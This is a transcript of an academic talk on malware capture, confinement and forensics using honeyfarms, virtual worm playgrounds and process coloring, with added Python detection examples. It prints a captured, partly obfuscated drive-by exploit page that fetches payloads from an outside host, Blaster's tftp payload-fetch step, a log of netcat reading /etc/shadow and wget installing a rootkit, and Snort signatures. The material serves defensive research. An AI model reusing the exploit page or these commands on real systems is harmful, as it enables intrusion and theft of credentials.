
Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS) Purdue University. Collaborators. Florian Buchholz (James Madison U.)


Presentation Transcript


  1. Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS) Purdue University

  2. Collaborators
    • Florian Buchholz (James Madison U.)
    • Xuxian Jiang (George Mason U.)
    • Junghwan Rhee (Purdue U.)
    • Ryan Riley (Purdue U.)
    • Eugene H. Spafford (Purdue U.)
    • AAron Walters (Fortify Research)
    • Helen Wang (Microsoft Research)
    • Yi-Min Wang (Microsoft Research)

  3. Motivation: Rampant Malware Outbreaks
    • Internet malware remains a top threat
    • Malware: Virus, Worm, Spyware, Keylogger, Bot…
    [Chart of outbreaks: Blaster, CodeRed, Nimda. Source: Symantec Internet Security Threat Report]

  4. Motivation: Stealthy Malware
    • Recruiting Vulnerable Nodes (e.g., to create a Botnet)
      • Zero-day exploits w/o software patches
      • Low-and-slow propagation
    • New attack strategies
      • Exploiting vulnerable client-side software, such as IE
      • Propagating malware with RFID tags
    • Providing “Value-Added” Service (or rather, harm)
      • DDoS, spamming, identity theft, …
      • Sell/rent botnets for profit

  5. Reality & Challenges
    • Lack of an investigation platform that enables
      • Early detection and capture of malware incidents
      • Replay and observation of malware behavior
    • At Internet scale this is hard to build
      • Increased spreading speed, sophistication, and malice
    [Figure callouts: Slammer worm infects 75,000 hosts in 10 minutes (Moore et al., 2003); Stealthy Malware, Zero-day Exploits, Mutations, …]

  6. Our Integrated Malware Research Framework
    [Framework diagram, built on Virtualization. Stages: Detection, Investigation, Defense. Components: Malware Trap (Front-End: Collapsar Honeyfarm; External Infection), Malware Playground (Back-End: vGround Playground), Contamination Tracking (Internal Contamination), Behavioral Footprinting, System Randomization. Publications: Collapsar: Security’04, NDSS’06, JPDC’06; vGround: RAID’05; Proc. Coloring: ICDCS’06; WORM’06]

  7. Part I: Malware Capture
    [Same framework diagram as slide 6, with the Front-End Collapsar Honeyfarm highlighted (Collapsar: Security’04, NDSS’06, JPDC’06; vGround: RAID’05; Coloring: ICDCS’06; WORM’06)]

  8. Existing Approach: Honeypot
    [Diagram: honeypots deployed separately in Domain A, Domain B and Domain C, each facing the Internet]
    • Two Weaknesses
      • Manageability vs. Detection Coverage
      • Security Risks → On-Site Attack Occurrences

  9. Our Approach: Collapsar
    [Diagram: Redirectors in Domain A, Domain B and Domain C forward traffic through a Front-End to the Collapsar Center, which hosts the VM-based Honeypots, a Management Station and a Correlation Engine (the Collapsar Honeyfarm)]
    • Benefit 1: Centralized management of honeypots w/ distributed (virtual) presence
    • Benefit 2: Off-site attack occurrences
    • Benefit 3: New possibilities for real-time attack correlation and log mining

  10. Collapsar as a Server-side Honeyfarm
    [Diagram: Redirectors in Domains A, B and C, Front-End, Collapsar Center with VM-based Honeypots]
    • Passive Honeypots w/ Vulnerable Server-side Software
      • Web Servers (e.g., Apache, IIS, …)
      • Database Servers (e.g., Oracle, MySQL, …)
    • Examples: Blaster (2003), Sasser (2004), Zotob (2005)

  11. Collapsar as a Client-side Honeyfarm
    [Diagram: as slide 10, with the VM-based Honeypots visiting a Malicious Web Server]
    • Active Honeypots w/ Vulnerable Client-side Software
      • Web Browsers (e.g., IE, Firefox, …)
      • Email Clients (e.g., Outlook, …)
    • PlanetLab (310 sites) [HoneyMonkey, NDSS’06]: 288 malicious sites / 2 zero-day exploits

  12. A Real Incident: Exploitation of Client-side Vulnerability
    • Upon Clicking a malicious URL
      • http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html
    • Result:
      <html><head><title></title></head><body>
      <style> * {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")} </style>
      <APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1>
      <PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET>
      <script> try{ document.write('<object data=`&#109&#115&#45&#105&#116&#115&#58 &#109&#104&#116&#109&#108&#58&#102&#105&#108&#101&#58; //C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+ 'm::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>'); }catch(e){}</script>
      </body></html>
    [Callouts on the page source: MS05-002, MS03-011, MS04-013]
    • 22 unwanted programs are installed without user’s consent!

  13. Related Work
    [Comparison table of related honeypot systems by approach (Passive, Active, or Passive & Active); the system names are not recoverable from the transcript]

  14. Part II: Malware Playground
    [Same framework diagram as slide 6, with the Back-End vGround highlighted (vGround: RAID’05; Collapsar: Security’04, NDSS’06, JPDC’06; Coloring: ICDCS’06)]

  15. Challenges
    • Fidelity: real worms
    • Confinement: destructive worms
    • Scalability: epidemic propagation pattern
    • Experimental Efficiency

  16. A Virtualization-Based Worm Playground
    • High Fidelity: VM, full-system virtualization
    • Strict Confinement: VN, link-layer network virtualization
    • Easy Deployment: locally deployable
    • Efficient Experiments
      • Image generation time: 60 seconds
      • Boot-strap time: 90 seconds
      • Tear-down time: 10 seconds
    [Diagram: a Worm Playground built on Virtualization, hosted on paris.cs.purdue.edu]
    • Reference: In “Fighting Computer Virus Attacks”, Peter Szor, USENIX Security Symp., 2004

  17. Challenge in Achieving Scalability
    • Three Main Techniques:
      • VM Footprint Minimization: Redhat 9.0 image, 1G → 32M
      • Delta Virtualization (a.k.a. Copy-on-Write)
      • Worm-driven vGround Runtime Expansion
    • 2000+ virtual nodes in 10 physical machines

  18. Worm Expert’s Comments on vGround

  19. vGround Impact & Applications
    • Evaluation
      • Correctness of documented worm/malware analysis
      • Effectiveness of defense mechanisms
    • Education Potentials

  20. Part III: Malware Defense
    [Same framework diagram as slide 6, with Contamination Tracking (Internal Contamination) highlighted (Coloring: ICDCS’06; vGround: RAID’05; Collapsar: Security’04, NDSS’06, JPDC’06)]

  21. Malware Forensics
    • For each malware incident, it is desirable to find out:
      • Break-in Point: How did the malware break into the system?
      • Contaminations: What did the malware do after the break-in?

  22. Current Approach
    • Question 1: How did the malware break into the system?
    • Question 2: What did the malware do after break-in?
    [Incident diagram: httpd spawns /bin/sh; /bin/sh spawns netcat (which reads /etc/shadow, confidential info) and wget (which creates local file(s): a Root kit), and modifies local files; the Root kit raises the Alert]

  23. Current Approach
    1: Online Log Collection
    Log:
      “httpd” READS an incoming request
      “httpd” CREATES a new process “/bin/sh”
      “/bin/sh” CREATES a new process “netcat”
      “netcat” READS “/etc/shadow” file
      “/bin/sh” MODIFIES local files
      “/bin/sh” CREATES a new process “wget”
      “wget” CREATES local file(s) - “Root kit”
    [Incident diagram as on slide 22; the Root kit raises the Alert]

  24. Current Approach
    1: Online Log Collection
    2: Offline Backward Tracking [King+, SOSP’03]
    Starting from the Alert (Root kit), walk the log backwards:
      “wget” CREATES local file(s) - “Root kit”
      “/bin/sh” CREATES a new process “wget”
      “httpd” CREATES a new process “/bin/sh”
      → Break-in Point!
    [Diagram: chain httpd → /bin/sh → wget → Root kit → Alert]

  25. Current Approach
    1: Online Log Collection
    2: Offline Backward Tracking
    3: Offline Forward Tracking
    Starting from the Break-in Point (“httpd” CREATES a new process “/bin/sh”), walk the log forwards:
      “/bin/sh” CREATES a new process “netcat”
      “netcat” READS “/etc/shadow” file
      “/bin/sh” MODIFIES local files
      “/bin/sh” CREATES a new process “wget”
      “wget” CREATES local file(s) - “Root kit”
    [Incident diagram as on slide 22, with the contaminations marked: /etc/shadow and confidential info, local files, Root kit → Alert]

  26. Weaknesses of Current Approach
    [Timeline: Intrusion Occurred … Long Detection Period … Intrusion Detected]
    • Backward Tracking → Break-in Point
      • Inputs: Detection point and the entire Log
    • Forward Tracking → Contaminations
      • Inputs: Break-in point and the entire Log
    • Analyze the entire log! High Volume Log Data: 1.2 gigabytes per day under server workload

  27. Our Approach - Process Coloring
    • Main Idea: Information Flow-Preserving Logging
    [Diagram: Apache, Sendmail, DNS and MySQL all write into one shared Log; a suspicious log entry is highlighted]

  28. Our Approach - Process Coloring
    1: Initial Coloring: init → rc → each service started at boot (s30sendmail, s45named, s55sshd, s80httpd) receives its own color
    2: Coloring Diffusion: the color follows the information flow (httpd → /bin/sh → netcat and wget; /etc/shadow and confidential info; local files; Root kit → Alert)
    • Benefit 1: Immediate identification of break-in point
    • Benefit 2: Color-based log partition for contamination analysis

  29. Color Diffusion Model
    • Color Diffusion Model: OS-level Information Flow (Buchholz 2005)
    Operation | syscalls                                   | Diffusion
    CREATE    | create <s1, o1>: create, mkdir, link       | color(o1) = color(s1)
              | create <s1, s2>: fork, vfork, clone        | color(s2) = color(s1)
    READ      | read <s1, o1>: read, readv, recv           | color(s1) = color(s1) ∪ color(o1)
              | read <s1, s2>: ptrace                      | color(s1) = color(s1) ∪ color(s2)
    WRITE     | write <s1, o1>: write, writev, send        | color(o1) = color(s1) ∪ color(o1)
              | write <s1, s2>: ptrace, wait, signal       | color(s2) = color(s1) ∪ color(s2)
    DESTROY   | destroy <s1, o1>: unlink, rmdir, close     | ----
              | destroy <s1, s2>: exit, kill               | ----

  30. Process Coloring Log – Slapper Worm
    ...
    BLUE: 673["sendmail"]: 5_open("/proc/loadavg", 0, 438) = 5
    BLUE: 673["sendmail"]: 192_mmap2(0, 4096, 3, 34, 4294967295, 0) = 1073868800
    BLUE: 673["sendmail"]: 3_read(5, "0.26 0.10 0.03 2...", 4096) = 25
    BLUE: 673["sendmail"]: 6_close(5) = 0
    BLUE: 673["sendmail"]: 91_munmap(1073868800, 4096) = 0
    ...
    RED: 2568["httpd"]: 102_accept(16, sockaddr{2, cbbdff3a}, cbbdff38) = 5
    RED: 2568["httpd"]: 3_read(5, "\1281\1\0\2\0\24...", 11) = 11
    RED: 2568["httpd"]: 3_read(5, "\7\0À\5\0\128\3\...", 40) = 40
    RED: 2568["httpd"]: 4_write(5, "\132@\4\0\1\0\2\...", 1090) = 1090
    …
    RED: 2568["httpd"]: 4_write(5, "\128\19Ê\136\18\...", 21) = 21
    RED: 2568["httpd"]: 63_dup2(5, 2) = 2
    RED: 2568["httpd"]: 63_dup2(5, 1) = 1
    RED: 2568["httpd"]: 63_dup2(5, 0) = 0
    RED: 2568["httpd"]: 11_execve("/bin//sh", bffff4e8, 00000000)
    RED: 2568["sh"]: 5_open("/etc/ld.so.prelo...", 0, 8) = −2
    RED: 2568["sh"]: 5_open("/etc/ld.so.cache", 0, 0) = 6
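The following is an added worked example, not code from the talk or from the Process Coloring prototype. It models, in Python, the two approaches contrasted on slides 22 to 30: BackTracker-style backward and forward tracking that must scan the whole log, and the slide-29 diffusion rules applied while the log is written, which give the break-in point and a per-color log partition directly. The log entries, the color names and the daemon names are constructed for the example; objects named "net:..." stand in for network input.

```python
from collections import defaultdict

# Constructed log in the style of slides 22-28 (not a real trace): each entry
# is (subject, operation, object). Processes and files share one namespace
# here for brevity; objects named "net:..." stand for network input.
LOG = [
    ("init", "create", "httpd"),
    ("init", "create", "sendmail"),
    ("init", "create", "sshd"),
    ("sendmail", "read", "/proc/loadavg"),
    ("httpd", "read", "net:client-request"),   # the break-in request
    ("httpd", "create", "/bin/sh"),
    ("/bin/sh", "create", "wget"),
    ("wget", "create", "/tmp/rootkit"),        # detection point (Alert)
    ("/bin/sh", "create", "netcat"),
    ("netcat", "read", "/etc/shadow"),
    ("/bin/sh", "write", "/etc/passwd"),
    ("sshd", "read", "/var/log/wtmp"),
]

# Step 1 of slide 28, initial colouring: colours handed to daemons at boot.
INITIAL = {"httpd": "RED", "sendmail": "BLUE", "sshd": "GREEN"}


def flow(entry):
    """Information flow of one entry as (source, destination); destroy
    operations carry no flow (slide 29, DESTROY row)."""
    subj, op, obj = entry
    if op in ("create", "write"):
        return subj, obj
    if op == "read":
        return obj, subj
    return None


def backward_track(log, sink):
    """BackTracker-style search [King+, SOSP'03]: indices of every entry whose
    information reaches `sink`. It scans the whole log, the cost slide 26
    points out; one reverse pass is enough because an entry can only depend
    on earlier entries."""
    tainted, hits = {sink}, set()
    for i in range(len(log) - 1, -1, -1):
        f = flow(log[i])
        if f and f[1] in tainted:
            tainted.add(f[0])
            hits.add(i)
    return hits


def forward_track(log, source):
    """Indices of every entry reached from `source` (the break-in point),
    including further actions of processes already under attacker control."""
    tainted, hits = {source}, set()
    for i, entry in enumerate(log):
        f = flow(entry)
        if entry[0] in tainted or (f and f[0] in tainted):
            hits.add(i)
            if f:
                tainted.add(f[1])
    return hits


def color_log(log, initial):
    """Apply the slide-29 diffusion model as the log is written: create copies
    the creator's colour, read/write take the union. Each entry is tagged with
    its subject's colour set, like the BLUE/RED prefixes on slide 30."""
    color = defaultdict(frozenset)
    tagged = []
    for subj, op, obj in log:
        if op == "create":
            # daemons started at boot get their initial colour instead of init's
            color[obj] = frozenset([initial[obj]]) if obj in initial else color[subj]
        elif op == "read":
            color[subj] = color[subj] | color[obj]
        elif op == "write":
            color[obj] = color[obj] | color[subj]
        tagged.append((color[subj], (subj, op, obj)))
    return tagged, dict(color)


def partition_by_color(tagged):
    """Benefit 2 (slide 28): one log stream per colour, so contamination
    analysis reads only the slice sharing the alert's colour."""
    parts = defaultdict(list)
    for colors, entry in tagged:
        for c in colors:
            parts[c].append(entry)
    return dict(parts)


def break_in_point(tagged, alert_color):
    """Benefit 1 (slide 28): the first network read by a process carrying the
    alert's colour, found without chasing dependencies through the whole log."""
    for colors, (subj, op, obj) in tagged:
        if alert_color in colors and op == "read" and obj.startswith("net:"):
            return subj, op, obj
    return None


if __name__ == "__main__":
    tagged, colors = color_log(LOG, INITIAL)
    alert = next(iter(colors["/tmp/rootkit"]))
    print("alert colour:", alert, "break-in:", break_in_point(tagged, alert))
    print("backward tracking over the whole log:", sorted(backward_track(LOG, "/tmp/rootkit")))
    print("forward tracking over the whole log:", sorted(forward_track(LOG, "net:client-request")))
    for c, entries in partition_by_color(tagged).items():
        print(c, "partition:", len(entries), "entries")
```

On this constructed log the RED partition contains exactly the entries that whole-log forward tracking from the break-in request finds, while the sendmail and sshd activity lands in separate partitions; the point of the model is that the partition is available as soon as the alert's colour is known, whereas the tracking functions have to revisit every entry.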

  31. Evaluation
    • Benefit for Backward Tracking: Immediate identification of break-in point
    • Benefit for Forward Tracking: Reduced log volume for contamination analysis

  32. Challenge in Log Collection
    • System Call Interception
    [Diagram: User Process 1 and User Process 2 above the OS Kernel, with the Logging component inside the kernel]
    • Question: Can we trust a compromised system to collect log information?

  33. Virtual Machine Introspection [Garfinkel+, NDSS’03]
    • Interception on system virtualization path: more tamper-resistant
    [Diagram: User Process 1 and User Process 2 run on a Guest OS Kernel (UML) inside a Virtual Machine; Logging moves from the guest kernel (ptrace) into the Host OS Kernel + VMM]

  34. On-going Work
    • Multi-Dimensional Worm Profiling & Identification
      • Content Fingerprinting: unique recurring content
      • Behavioral Footprinting: unique recurring behavior → Infection Cycle
        • Probing → Exploitation → Replication → Payload

  35. MSBlaster/Windows Worm
    [Diagram: Blaster at 192.168.0.1 against Target/RPC at 192.168.10.11]
    1. Exploits target on port 135/TCP
    2. Binds svchost.exe to port 4444/TCP via injected code
    3. Connects to target on port 4444/TCP
    4. Creates a shell “cmd.exe” and binds it to port 4444/TCP
    5. Creates “TFTP Server” on port 69/UDP
    6. Sends “TFTP” command to shell
    7. Runs TFTP command; “teleports” msblast.exe file (>tftp –I 192.168.0.1 GET msblast.exe)
    8. Sends “START msblast.exe” command
    9. Runs worm on target!
    10. Closes connection; shell closes
    Signature on step 1: alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)

  36. MSBlaster RPC-DCOM Exploitation
    alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)
    [Diagram: the signature covers the Exploitation phase; the Replication phase follows]
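An added detection example, not code from the talk or its tools: the content signature above matches one packet, whereas the behavioral footprint of slides 34 and 35 is an ordered sequence of connections. The matcher below, in Python, checks constructed flow records against that sequence (135/TCP and 4444/TCP from attacker to target, then 69/UDP from the target back to the attacker) inside a time window, and reports only completed sequences. It is written for any ordered footprint, not just Blaster's; the flow records, the host 10.0.0.x addresses and the window length are constructed for the example, while 192.168.0.1 and 192.168.10.11 are the pair drawn on slide 35.

```python
from collections import namedtuple

# Constructed flow records (not captured traffic): one per connection or
# datagram exchange, with t in seconds. Address pair reused from slide 35.
Flow = namedtuple("Flow", "t src dst proto dport")

FLOWS = [
    Flow(0.0, "192.168.0.1", "192.168.10.11", "tcp", 135),   # probe/exploit
    Flow(0.4, "192.168.0.1", "192.168.10.11", "tcp", 4444),  # shell connection
    Flow(1.1, "192.168.10.11", "192.168.0.1", "udp", 69),    # target fetches payload
    Flow(2.0, "10.0.0.5", "192.168.10.12", "tcp", 135),      # lone RPC client, benign
    Flow(3.0, "10.0.0.9", "192.168.10.13", "tcp", 4444),     # no prior 135/TCP step
    Flow(9.0, "10.0.0.5", "192.168.10.12", "tcp", 4444),     # 135 then 4444, never tftp
]

# Footprint of the slide-35 infection cycle. Each step is (proto, dport,
# direction): "a->t" attacker to target, "t->a" target back to the attacker.
BLASTER_FOOTPRINT = (
    ("tcp", 135, "a->t"),
    ("tcp", 4444, "a->t"),
    ("udp", 69, "t->a"),
)


def _matches(flow, step, attacker, target):
    """True if `flow` is the expected step for this attacker/target pair."""
    proto, port, direction = step
    src, dst = (attacker, target) if direction == "a->t" else (target, attacker)
    return (flow.proto, flow.dport, flow.src, flow.dst) == (proto, port, src, dst)


def match_footprint(flows, footprint, window):
    """Return one (attacker, target, evidence_flows) tuple per completed
    footprint. A candidate opens on the first step and must see every later
    step, in order, within `window` seconds of opening; partial matches such
    as a single 135/TCP connection are never reported."""
    candidates, hits = [], []
    for f in sorted(flows, key=lambda x: x.t):
        still_open = []
        for c in candidates:
            if f.t - c["start"] > window:
                continue  # expired partial match: dropped, not reported
            if _matches(f, footprint[c["step"]], c["a"], c["t"]):
                c["step"] += 1
                c["flows"].append(f)
            if c["step"] == len(footprint):
                hits.append((c["a"], c["t"], c["flows"]))
            else:
                still_open.append(c)
        candidates = still_open
        if _matches(f, footprint[0], f.src, f.dst):
            candidates.append({"a": f.src, "t": f.dst, "step": 1,
                               "start": f.t, "flows": [f]})
    return hits


if __name__ == "__main__":
    for attacker, target, evidence in match_footprint(FLOWS, BLASTER_FOOTPRINT, window=10.0):
        print(f"Blaster footprint: {attacker} -> {target}")
        for f in evidence:
            print(f"  t={f.t:4.1f} {f.src} -> {f.dst} {f.proto}/{f.dport}")
```

The direction field is what separates this from three independent port rules: the tftp step only counts when the freshly exploited host is the one opening the UDP flow back to the attacker, which is how the "teleport" of msblast.exe looks on the wire.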

  37. [Figure: worms and the vulnerable services they exploit: MSBlaster and Welchia (RPC-DCOM); Sasser (LSASS); Ramen (LPRng, WU-FTPD, NFS-UTILS); Lion (BIND); Slapper (Apache); SARS (Samba)]

  38. Summary
    [Diagram: Collapsar (Redirectors in Domains A, B and C with a Front-End) feeding vGround I and vGround II]
    • Design and evaluation of advanced malware defense mechanisms using our unique integrated malware research platform

  39. Thank you. For more information: Email: dxu@cs.purdue.edu, URL: http://www.cs.purdue.edu/~dxu

  40. Backup Slides

  41. Another Example Incident: Windows XP Server-side Honeypot/VMware
    • Vulnerability: RPC DCOM vulnerability (Microsoft Security Bulletin MS03-026)
    • Time-line
      • Deployed: 22:10:00pm, 11/26/03
      • MSBlast: 00:36:47am, 11/27/03
      • Enbiei: 01:48:57am, 11/27/03
      • Nachi: 07:03:55am, 11/27/03
    • http://www.cs.purdue.edu/homes/jiangx/collapsar

  42. vGround: Network Virtualization
    • Option 1: Network-Layer Virtualization (e.g., X-Bone): IP-IP tunnels between the Guest OSes
    • Option 2: Link-Layer Virtualization (e.g., VIOLIN): a Virtual Switch connecting Virtual Machine 1 and Virtual Machine 2 on their Host OS / VMM

  43. Logging Integrity -- Existing Approach: System call interception
    [Diagram: a user-space call such as fork(“/bin/sh”) enters the kernel-space System Call Dispatcher, which indexes the System Call Table (0 restart_syscall → sys_restart_syscall, 1 exit → sys_exit, 2 fork → sys_fork, 3 read → sys_read, 4 write → sys_write, …, 283 ni_syscall → sys_ni_syscall); logging hooks (log_restart_syscall, log_exit, log_fork, log_read, log_write, log_ni_syscall) wrap each entry before the result returns to user space]
    • Unreliable!

  44. Virtual Machine Introspection [Garfinkel+, NDSS’03]
    • Interception at System Virtualization Path
    [Diagram: Type 1 VMM (Guest OS 1 and Guest OS 2 on a Virtual Machine Monitor running directly on Hardware) and Type 2 VMM (Guest OS 1 and Guest OS 2 on a VMM hosted by a Host OS on Hardware); Logging sits in the VMM beneath the guests]
    • Tamper-Resistant!

  45. Process Coloring -- Slapper Worm
    [Process tree recovered from the colored log:
      inet_sock(80) → recv → 2568: httpd (accept fd 5, dup2, read)
      → execve → 2568(execve): /bin//sh
      → execve → 2568(execve): /bin/bash -i
      → fork, execve → 2586: /bin/rm –rf /tmp/.bugtraq.c (unlink /tmp/.bugtraq.c)
      → fork, execve → 2587: /bin/cat (open, dup2, write → /tmp/.uubugtraq)]

  46. Process Coloring Log – Slapper Worm
    [Repeats the slide 45 process tree: inet_sock(80) → httpd (2568) → /bin//sh → /bin/bash -i → /bin/rm –rf /tmp/.bugtraq.c (2586) and /bin/cat → /tmp/.uubugtraq (2587)]

  47. Counter-attacks against Proc. Coloring
    • Coloring mixing attack
      • Good news: an important anomaly itself
      • Bad news: need for advanced filtering policies
    • Low-level attack
      • Kernel integrity (e.g., CoPilot, Livewire, Pioneer)
      • Shadow structure via VMM
    • Diffusion-cutting attack
      • Covert channels

  48. Footprinting Representation: MSBlaster Worm
    [Sequence diagram between attacker and target]
    • 1st TCP handshake on 135/TCP; payload matches alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …); connection ends with RST
    • 2nd TCP handshake on 4444/TCP (shell)
    • Sending “tftp …”; transfer on 69/UDP (tftp); connection ends with RST
